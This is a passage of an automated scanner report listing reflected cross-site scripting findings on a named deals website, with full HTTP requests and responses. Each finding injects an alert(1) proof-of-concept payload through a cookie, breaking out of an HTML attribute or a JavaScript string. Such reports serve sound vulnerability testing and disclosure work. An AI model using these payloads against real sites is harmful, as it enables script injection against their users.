Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa4fb5"%3balert(1)//cc77090642d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:10 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa4fb5";alert(1)//cc77090642d"
});
</script>
...[SNIP]...

1.202. http://deals.lycos.com/deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b18fe"><script>alert(1)</script>50f5a41c6f0 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab18fe"><script>alert(1)</script>50f5a41c6f0; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:09 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
tp://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/lenovo-core-i5-dual-2-53ghz-16-for-599-414281&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab18fe"><script>alert(1)</script>50f5a41c6f0&amp;cj=1" alt="tracker" />
...[SNIP]...

1.203. http://deals.lycos.com/deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34cf6"%3balert(1)//17d3e5f2582 was submitted in the diktfc cookie. This input was echoed as 34cf6";alert(1)//17d3e5f2582 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A34cf6"%3balert(1)//17d3e5f2582; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:07 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
script">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A34cf6";alert(1)//17d3e5f2582"
});
</script>
...[SNIP]...

1.204. http://deals.lycos.com/deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57098"><script>alert(1)</script>17fbef7573c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A57098"><script>alert(1)</script>17fbef7573c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:05 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/lenovo-i5-dual-1-33ghz-12-laptop-599-414318&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A57098"><script>alert(1)</script>17fbef7573c&amp;cj=1" alt="tracker" />
...[SNIP]...

1.205. http://deals.lycos.com/deal/lg-32-1080p-lcd-hdtv-for-399-414373 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lg-32-1080p-lcd-hdtv-for-399-414373

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1ca8"%3balert(1)//8f632b01aa9 was submitted in the diktfc cookie. This input was echoed as b1ca8";alert(1)//8f632b01aa9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/lg-32-1080p-lcd-hdtv-for-399-414373 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab1ca8"%3balert(1)//8f632b01aa9; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:26 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ext/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/lg-32-1080p-lcd-hdtv-for-399-414373",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab1ca8";alert(1)//8f632b01aa9"
});
</script>
...[SNIP]...

1.206. http://deals.lycos.com/deal/lg-32-1080p-lcd-hdtv-for-399-414373 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lg-32-1080p-lcd-hdtv-for-399-414373

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ec67"><script>alert(1)</script>28b95ad8bc4 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/lg-32-1080p-lcd-hdtv-for-399-414373 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6ec67"><script>alert(1)</script>28b95ad8bc4; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
mg src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/lg-32-1080p-lcd-hdtv-for-399-414373&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6ec67"><script>alert(1)</script>28b95ad8bc4&amp;cj=1" alt="tracker" />
...[SNIP]...

1.207. http://deals.lycos.com/deal/lg-42-1080p-lcd-hdtv-for-479-414598 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lg-42-1080p-lcd-hdtv-for-479-414598

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cc41"><script>alert(1)</script>85a55a54eb2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/lg-42-1080p-lcd-hdtv-for-479-414598 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2cc41"><script>alert(1)</script>85a55a54eb2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:10 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
mg src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/lg-42-1080p-lcd-hdtv-for-479-414598&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2cc41"><script>alert(1)</script>85a55a54eb2&amp;cj=1" alt="tracker" />
...[SNIP]...

1.208. http://deals.lycos.com/deal/lg-42-1080p-lcd-hdtv-for-479-414598 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lg-42-1080p-lcd-hdtv-for-479-414598

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb5d0"%3balert(1)//a5de5727a34 was submitted in the diktfc cookie. This input was echoed as eb5d0";alert(1)//a5de5727a34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/lg-42-1080p-lcd-hdtv-for-479-414598 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aeb5d0"%3balert(1)//a5de5727a34; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ext/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/lg-42-1080p-lcd-hdtv-for-479-414598",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aeb5d0";alert(1)//a5de5727a34"
});
</script>
...[SNIP]...

1.209. http://deals.lycos.com/deal/logmein-ignition-for-iphone-for-20-413418 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/logmein-ignition-for-iphone-for-20-413418

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f448f"><script>alert(1)</script>e4b28d91281 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/logmein-ignition-for-iphone-for-20-413418 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af448f"><script>alert(1)</script>e4b28d91281; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/logmein-ignition-for-iphone-for-20-413418&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af448f"><script>alert(1)</script>e4b28d91281&amp;cj=1" alt="tracker" />
...[SNIP]...

1.210. http://deals.lycos.com/deal/logmein-ignition-for-iphone-for-20-413418 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/logmein-ignition-for-iphone-for-20-413418

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f691"%3balert(1)//38cfa6531c3 was submitted in the diktfc cookie. This input was echoed as 6f691";alert(1)//38cfa6531c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/logmein-ignition-for-iphone-for-20-413418 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6f691"%3balert(1)//38cfa6531c3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:12 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
vascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/logmein-ignition-for-iphone-for-20-413418",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6f691";alert(1)//38cfa6531c3"
});
</script>
...[SNIP]...

1.211. http://deals.lycos.com/deal/mirror-s-edge-for-iphone-for-1-414300 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/mirror-s-edge-for-iphone-for-1-414300

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa8ec"><script>alert(1)</script>6cc672e8440 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/mirror-s-edge-for-iphone-for-1-414300 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaa8ec"><script>alert(1)</script>6cc672e8440; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:45 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/mirror-s-edge-for-iphone-for-1-414300&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaa8ec"><script>alert(1)</script>6cc672e8440&amp;cj=1" alt="tracker" />
...[SNIP]...

1.212. http://deals.lycos.com/deal/mirror-s-edge-for-iphone-for-1-414300 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/mirror-s-edge-for-iphone-for-1-414300

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d87f"%3balert(1)//0adce29b43c was submitted in the diktfc cookie. This input was echoed as 4d87f";alert(1)//0adce29b43c in the application's response.

